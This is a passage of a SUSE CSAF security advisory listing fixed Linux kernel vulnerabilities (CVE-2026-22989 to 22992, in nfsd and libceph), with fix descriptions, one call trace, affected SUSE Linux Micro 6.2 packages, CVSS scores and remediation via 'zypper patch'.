"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: check that server is running in unlock_filesystem\n\nIf we are trying to unlock the filesystem via an administrative\ninterface and nfsd isn\u0027t running, it crashes the server. This\nhappens currently because nfsd4_revoke_states() access state\nstructures (eg., conf_id_hashtbl) that has been freed as a part\nof the server shutdown.\n\n[ 59.465072] Call trace:\n[ 59.465308] nfsd4_revoke_states+0x1b4/0x898 [nfsd] (P)\n[ 59.465830] write_unlock_fs+0x258/0x440 [nfsd]\n[ 59.466278] nfsctl_transaction_write+0xb0/0x120 [nfsd]\n[ 59.466780] vfs_write+0x1f0/0x938\n[ 59.467088] ksys_write+0xfc/0x1f8\n[ 59.467395] __arm64_sys_write+0x74/0xb8\n[ 59.467746] invoke_syscall.constprop.0+0xdc/0x1e8\n[ 59.468177] do_el0_svc+0x154/0x1d8\n[ 59.468489] el0_svc+0x40/0xe0\n[ 59.468767] el0t_64_sync_handler+0xa0/0xe8\n[ 59.469138] el0t_64_sync+0x1ac/0x1b0\n\nEnsure this can\u0027t happen by taking the nfsd_mutex and checking that\nthe server is still up, and then holding the mutex across the call to\nnfsd4_revoke_states().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22989",
"url": "https://www.suse.com/security/cve/CVE-2026-22989"
},
{
"category": "external",
"summary": "SUSE Bug 1257279 for CVE-2026-22989",
"url": "https://bugzilla.suse.com/1257279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22989"
},
{
"cve": "CVE-2026-22990",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22990"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: replace overzealous BUG_ON in osdmap_apply_incremental()\n\nIf the osdmap is (maliciously) corrupted such that the incremental\nosdmap epoch is different from what is expected, there is no need to\nBUG. Instead, just declare the incremental osdmap to be invalid.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22990",
"url": "https://www.suse.com/security/cve/CVE-2026-22990"
},
{
"category": "external",
"summary": "SUSE Bug 1257221 for CVE-2026-22990",
"url": "https://bugzilla.suse.com/1257221"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22990"
},
{
"cve": "CVE-2026-22991",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22991"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make free_choose_arg_map() resilient to partial allocation\n\nfree_choose_arg_map() may dereference a NULL pointer if its caller fails\nafter a partial allocation.\n\nFor example, in decode_choose_args(), if allocation of arg_map-\u003eargs\nfails, execution jumps to the fail label and free_choose_arg_map() is\ncalled. Since arg_map-\u003esize is updated to a non-zero value before memory\nallocation, free_choose_arg_map() will iterate over arg_map-\u003eargs and\ndereference a NULL pointer.\n\nTo prevent this potential NULL pointer dereference and make\nfree_choose_arg_map() more resilient, add checks for pointers before\niterating.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22991",
"url": "https://www.suse.com/security/cve/CVE-2026-22991"
},
{
"category": "external",
"summary": "SUSE Bug 1257220 for CVE-2026-22991",
"url": "https://bugzilla.suse.com/1257220"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22991"
},
{
"cve": "CVE-2026-22992",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22992"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: return the handler error from mon_handle_auth_done()\n\nCurrently any error from ceph_auth_handle_reply_done() is propagated\nvia finish_auth() but isn\u0027t returned from mon_handle_auth_done(). This\nresults in higher layers learning that (despite the monitor considering\nus to be successfully authenticated) something went wrong in the\nauthentication phase and reacting accordingly, but msgr2 still trying\nto proceed with establishing the session in the background. In the\ncase of secure mode this can trigger a WARN in setup_crypto() and later\nlead to a NULL pointer dereference inside of prepare_auth_signature().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
